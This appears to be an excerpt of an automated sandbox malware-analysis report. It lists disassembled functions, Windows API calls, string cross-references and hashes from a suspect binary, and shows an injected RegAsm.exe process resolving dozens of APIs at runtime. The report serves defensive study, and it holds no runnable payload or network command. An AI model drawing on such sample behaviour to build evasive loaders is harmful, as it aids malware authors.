GetLastError.KERNEL32(?,00A0AA43,00000000,00000001,00A2A744,?,?,?,00A0ABE6,00000004,InitializeCriticalSectionEx,00A20C90,InitializeCriticalSectionEx,00000000,?,00A0A99D), ref: 00A0AAA9
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00A098B3), ref: 00A0AAD1

Strings

api-ms-, xrefs: 00A0AAB6

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: e29266e52098c9e43bb9553983fe98765111103f806204dcea7700e6933f6b1a
Instruction ID: 35e494a4715276e0afe542bf595e7ef104f27f72f4768312bfe73b23270f6314
Opcode Fuzzy Hash: e29266e52098c9e43bb9553983fe98765111103f806204dcea7700e6933f6b1a
Instruction Fuzzy Hash: 38E01230740309BBEB105BB1FD06B993B55AB20B90F108030F94DE44E2E771D951D595

Uniqueness

Uniqueness Score: -1.00%

Function 00A13AD6 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(126C9991,00000000,00000000,00000000), ref: 00A13B39

Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A13D94
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A13DDC
GetLastError.KERNEL32 ref: 00A13E7F

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 143b49d3a021703b772fcdd86ecebaacd90ad87de0f0082262faaef224370097
Instruction ID: b7d3bdc87091e4ce03addd9451c2214eeb45f1b9334687ac528376ffe69be6d3
Opcode Fuzzy Hash: 143b49d3a021703b772fcdd86ecebaacd90ad87de0f0082262faaef224370097
Instruction Fuzzy Hash: BDD16A76D042589FCF11CFA8D8809EDBBF5FF08310F18456AE855EB251D730AA96CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A09A61 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A09B28
___AdjustPointer.LIBCMT ref: 00A09B4B
___AdjustPointer.LIBCMT ref: 00A09BE7

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: abd7e70984516035e69c1e90cb42cc8bd6e067904d519d39c34710a9f91d8bca
Instruction ID: 8055e51eb2747d8c45f6ddd51508f440304c7050239ac984dea9f1e958e84898
Opcode Fuzzy Hash: abd7e70984516035e69c1e90cb42cc8bd6e067904d519d39c34710a9f91d8bca
Instruction Fuzzy Hash: 0D51B3B1A0520AAFEB298F54F981BBBB7A4FF45720F14452DE806872D2D731ED41D790

Uniqueness

Uniqueness Score: -1.00%

Function 00A170EE Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E

GetLastError.KERNEL32 ref: 00A17152
__dosmaperr.LIBCMT ref: 00A17159
GetLastError.KERNEL32(?,?,?,?), ref: 00A17193
__dosmaperr.LIBCMT ref: 00A1719A

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d65716e84908e54c45de48ca6d00cacb542bf618f8cb5c38151d4d8662e3f568
Instruction ID: 54329dd1978ca2f842227c334dd2788db510622a999ddfd3f83fc43e3092ab0c
Opcode Fuzzy Hash: d65716e84908e54c45de48ca6d00cacb542bf618f8cb5c38151d4d8662e3f568
Instruction Fuzzy Hash: 0A219871604609BFDB21EF659E81CAFB7B9EF443647108619F95997261DB30ECC087A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A0E6B8 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cad1c00c60e748bcde132227ce895556006c50d840eb69a6b2a0ad6fd5b724c7
Instruction ID: 90d6b4a2e2959408b61f988bf03a5066c2b912026bf06c41214a0c3c28527744
Opcode Fuzzy Hash: cad1c00c60e748bcde132227ce895556006c50d840eb69a6b2a0ad6fd5b724c7
Instruction Fuzzy Hash: 35219D3160020DAFDB20EF71BD80D6A77A9EF04364B108D25F859D7291EB31EC50A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A18084 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00A1808C

Part of subcall function 00A16CD2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00A15E00,?,00000000,-00000008), ref: 00A16D7E

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A180C4
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A180E4

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 6b303717635924df7e95f155b9b86b209659f5662411a0774059fd758c023792
Instruction ID: 1067d1719f687ff238119eeee79f6eda73d16c65a41f8a4b5f4afce04562e6c2
Opcode Fuzzy Hash: 6b303717635924df7e95f155b9b86b209659f5662411a0774059fd758c023792
Instruction Fuzzy Hash: C511C4B2505519BE671167F19D8ECEF796DDF593A47204224FA05D1101FF78DD8282B0

Uniqueness

Uniqueness Score: -1.00%

Function 00A41F21 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00A41F47

Part of subcall function 00A41D73: __fltout2.LIBCMT ref: 00A41D9E

__cftog_l.LIBCMT ref: 00A41F6D
__cftoe_l.LIBCMT ref: 00A41F9F

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: ba0fb26c0215c6ec26a49a7ed249d1daf5ce8ddf658b1cddf3e8c06aca939f23
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: C611487A40414EBBCF125F84CD428EE3F62BF98394B588516FA2859031C337C9B6AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A428B0 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00A428BC

Part of subcall function 00A43214: __getptd_noexit.LIBCMT ref: 00A43217
Part of subcall function 00A43214: __amsg_exit.LIBCMT ref: 00A43224

__amsg_exit.LIBCMT ref: 00A428DC
__lock.LIBCMT ref: 00A428EC
_free.LIBCMT ref: 00A4291C

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: bcc54860c0364ad39d5e278b36aed9ff1ade0f683d854c4eb23ae6917159c085
Instruction ID: 6da46802937a7f82132b0894ac577bf9af3caba629100c53acaf4ac929d6dfbf
Opcode Fuzzy Hash: bcc54860c0364ad39d5e278b36aed9ff1ade0f683d854c4eb23ae6917159c085
Instruction Fuzzy Hash: B101B53AE01621ABDB31AF65AD0575DB7A0FFC4720FD44016F814A7292CB346E82CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C594 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000), ref: 00A1C5AB
GetLastError.KERNEL32(?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000,00000000,?,00A1445A,00000000), ref: 00A1C5B7

Part of subcall function 00A1C57D: CloseHandle.KERNEL32(FFFFFFFE,00A1C5C7,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000,00000000), ref: 00A1C58D

___initconout.LIBCMT ref: 00A1C5C7

Part of subcall function 00A1C53F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A1C56E,00A1B471,00000000,?,00A13ED3,00000000,00000000,00000000,00000000), ref: 00A1C552

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00A1B484,00000000,00000001,00000000,00000000,?,00A13ED3,00000000,00000000,00000000,00000000), ref: 00A1C5DC

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ceba52235565165535f1d21e26e54f4abc275134138ec85663130d0ed0d98234
Instruction ID: 54aa841bab9eb4b4fea0c58f0b0280573c7bf8271822480a1be920f7098e9447
Opcode Fuzzy Hash: ceba52235565165535f1d21e26e54f4abc275134138ec85663130d0ed0d98234
Instruction Fuzzy Hash: 4BF01C36481265BFCF225FD5EC059DA7F66EB487B1F004160FA4986120C6329962DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A023AD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A023B4
_strlen.LIBCMT ref: 00A023D3

Strings

ASubcioXAos, xrefs: 00A023B9, 00A023D2

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_strlen
String ID: ASubcioXAos
API String ID: 3133806014-3705083126
Opcode ID: d6d0d013672d2188e9cd481f838136ae5e1718f6ea63cf9bdc684df465329a26
Instruction ID: 6370ec6285dd7dfb73f8a59d8de6cf5496f63742ad17507137a26d9022cdd0c9
Opcode Fuzzy Hash: d6d0d013672d2188e9cd481f838136ae5e1718f6ea63cf9bdc684df465329a26
Instruction Fuzzy Hash: 41813D70E002188FDB24DF9CE994AADBBF1BF98320F24826AE459A73D1D7319D41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A01C89 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00A01C8E

Part of subcall function 00A0353D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A03549

Part of subcall function 00A021B1: _strlen.LIBCMT ref: 00A021C9

Strings

Divide, xrefs: 00A01CBD
map/set too long, xrefs: 00A01C89

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_strlenstd::_std::invalid_argument::invalid_argument
String ID: Divide$map/set too long
API String ID: 16509066-2202391395
Opcode ID: 8f6b7c89fad4890d3fa4d4dc4937d8f6b650aeb5080d10428074270461382a63
Instruction ID: b8444e8c310447d7fdcdb7e4e82d4b88749925d950042115e8e53cacee968fd9
Opcode Fuzzy Hash: 8f6b7c89fad4890d3fa4d4dc4937d8f6b650aeb5080d10428074270461382a63
Instruction Fuzzy Hash: DA5104311083588FC311EF28E9846AABFE4BF95314F08096DE9D587293D374D909C792

Uniqueness

Uniqueness Score: -1.00%

Function 00A02666 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A0266D
_strlen.LIBCMT ref: 00A02685

Strings

Brightness, xrefs: 00A02680, 00A0274B

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: H_prolog3_catch_strlen
String ID: Brightness
API String ID: 3133806014-2519455027
Opcode ID: 0729c7d722f97faabd801073a6fc46dcf99e4890b9d47311cbc837f86728da9f
Instruction ID: cc316814fad3ef11b4f6cd7e51c743c18f0241a30179dd9bf62e212ba986e3a3
Opcode Fuzzy Hash: 0729c7d722f97faabd801073a6fc46dcf99e4890b9d47311cbc837f86728da9f
Instruction Fuzzy Hash: BD418771B00318CFD725DB9CE9C8AAC77F1BF58724F24426AE115AB2E1C6729D82CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A05D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00A0A082

Strings

RCC, xrefs: 00A0A09C
MOC, xrefs: 00A0A094

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: d76fba7cdd64f4d16103d4210a4566ce13707cf34c686f036689be5fdf8dbcaf
Instruction ID: 3ab45f77360c6f4cae990faa8e455b167ad4563ec47dd05ebee9350ba6c2de57
Opcode Fuzzy Hash: d76fba7cdd64f4d16103d4210a4566ce13707cf34c686f036689be5fdf8dbcaf
Instruction Fuzzy Hash: 6041683190020DAFCF15DF98ED81AEEBBB5FF58300F148259F904672A1D3359951DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A015D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A015DC
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00A01614

Part of subcall function 00A037E7: _Yarn.LIBCPMT ref: 00A03806
Part of subcall function 00A037E7: _Yarn.LIBCPMT ref: 00A0382A

Strings

bad locale name, xrefs: 00A01622

Memory Dump Source

Source File: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 472539386d5cfe171542761d5781202b00b3aadd97b393345451ba818b6ff7c5
Instruction ID: 54010370cb066a67c165f3cb3d817df97ce47bd3e9435af148910b1e304ff0ab
Opcode Fuzzy Hash: 472539386d5cfe171542761d5781202b00b3aadd97b393345451ba818b6ff7c5
Instruction Fuzzy Hash: 44F06D72505B809EC3308F7AA990443FBE8BE29310780CE2EE0DEC3A51C330A504CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00A37E68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00A37E93
__CxxThrowException@8.LIBCMT ref: 00A37EA8

Strings

tAB, xrefs: 00A37EA1

Memory Dump Source

Source File: 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true

Associated: 00000000.00000002.1634484057.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634501454.0000000000A01000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634521754.0000000000A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634566285.0000000000A5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1634583638.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_file.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: tAB
API String ID: 3728558374-3708372838
Opcode ID: 0b5a25ec8658adcdf39324c624ed28cb706a99bd5b3b82256d3a41df1fa63ec0
Instruction ID: 4c9a41a057404f6d95e74594dc36f162ad66326a0e50a776c5ae253ed81911a0
Opcode Fuzzy Hash: 0b5a25ec8658adcdf39324c624ed28cb706a99bd5b3b82256d3a41df1fa63ec0
Instruction Fuzzy Hash: 70E09B75D1020DBACF20EFB4D8417CD77B89F50395F20C2A6F81495080DB70D688CB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exePID: 7440, Parent PID: 7420COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0.9%
Signature Coverage:	4.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	36

Executed Functions

Function 0041608F Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,004153D3), ref: 004160A3
GetProcAddress.KERNEL32 ref: 004160BA
GetProcAddress.KERNEL32 ref: 004160D1
GetProcAddress.KERNEL32 ref: 004160E8
GetProcAddress.KERNEL32 ref: 004160FF
GetProcAddress.KERNEL32 ref: 00416116
GetProcAddress.KERNEL32 ref: 0041612D
GetProcAddress.KERNEL32 ref: 00416144
GetProcAddress.KERNEL32 ref: 0041615B
GetProcAddress.KERNEL32 ref: 00416172
GetProcAddress.KERNEL32 ref: 00416189
GetProcAddress.KERNEL32 ref: 004161A0
GetProcAddress.KERNEL32 ref: 004161B7
GetProcAddress.KERNEL32 ref: 004161CE
GetProcAddress.KERNEL32 ref: 004161E5
GetProcAddress.KERNEL32 ref: 004161FC
GetProcAddress.KERNEL32 ref: 00416213
GetProcAddress.KERNEL32 ref: 0041622A
GetProcAddress.KERNEL32 ref: 00416241
GetProcAddress.KERNEL32 ref: 00416258
GetProcAddress.KERNEL32 ref: 0041626F
GetProcAddress.KERNEL32 ref: 00416286
GetProcAddress.KERNEL32 ref: 0041629D
GetProcAddress.KERNEL32 ref: 004162B4
GetProcAddress.KERNEL32 ref: 004162CB
GetProcAddress.KERNEL32 ref: 004162E2
GetProcAddress.KERNEL32 ref: 004162F9
GetProcAddress.KERNEL32 ref: 00416310
GetProcAddress.KERNEL32 ref: 00416327
GetProcAddress.KERNEL32 ref: 0041633E
GetProcAddress.KERNEL32 ref: 00416355
GetProcAddress.KERNEL32 ref: 0041636C
GetProcAddress.KERNEL32 ref: 00416383
GetProcAddress.KERNEL32 ref: 0041639A
GetProcAddress.KERNEL32 ref: 004163B1
GetProcAddress.KERNEL32 ref: 004163C8
GetProcAddress.KERNEL32 ref: 004163DF
GetProcAddress.KERNEL32 ref: 004163F6
GetProcAddress.KERNEL32 ref: 0041640D
GetProcAddress.KERNEL32 ref: 00416424
GetProcAddress.KERNEL32 ref: 0041643B
GetProcAddress.KERNEL32 ref: 00416452
GetProcAddress.KERNEL32 ref: 00416469
LoadLibraryA.KERNEL32(004153D3,?,00000040,00000064,004120B6,0041174F,?,0000002C,00000064,00412035,00412072,?,00000024,00000064,Function_00011FF8,00411CE1), ref: 0041647A
LoadLibraryA.KERNEL32 ref: 0041648B
LoadLibraryA.KERNEL32 ref: 0041649C
LoadLibraryA.KERNEL32 ref: 004164AD
LoadLibraryA.KERNEL32 ref: 004164BE
LoadLibraryA.KERNEL32 ref: 004164CF
LoadLibraryA.KERNEL32 ref: 004164E0
LoadLibraryA.KERNEL32 ref: 004164F1
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00416501
GetProcAddress.KERNEL32(75290000), ref: 0041651C
GetProcAddress.KERNEL32 ref: 00416533
GetProcAddress.KERNEL32 ref: 0041654A
GetProcAddress.KERNEL32 ref: 00416561
GetProcAddress.KERNEL32 ref: 00416578
GetProcAddress.KERNEL32(734C0000), ref: 00416597
GetProcAddress.KERNEL32 ref: 004165AE
GetProcAddress.KERNEL32 ref: 004165C5
GetProcAddress.KERNEL32 ref: 004165DC
GetProcAddress.KERNEL32 ref: 004165F3
GetProcAddress.KERNEL32 ref: 0041660A
GetProcAddress.KERNEL32 ref: 00416621
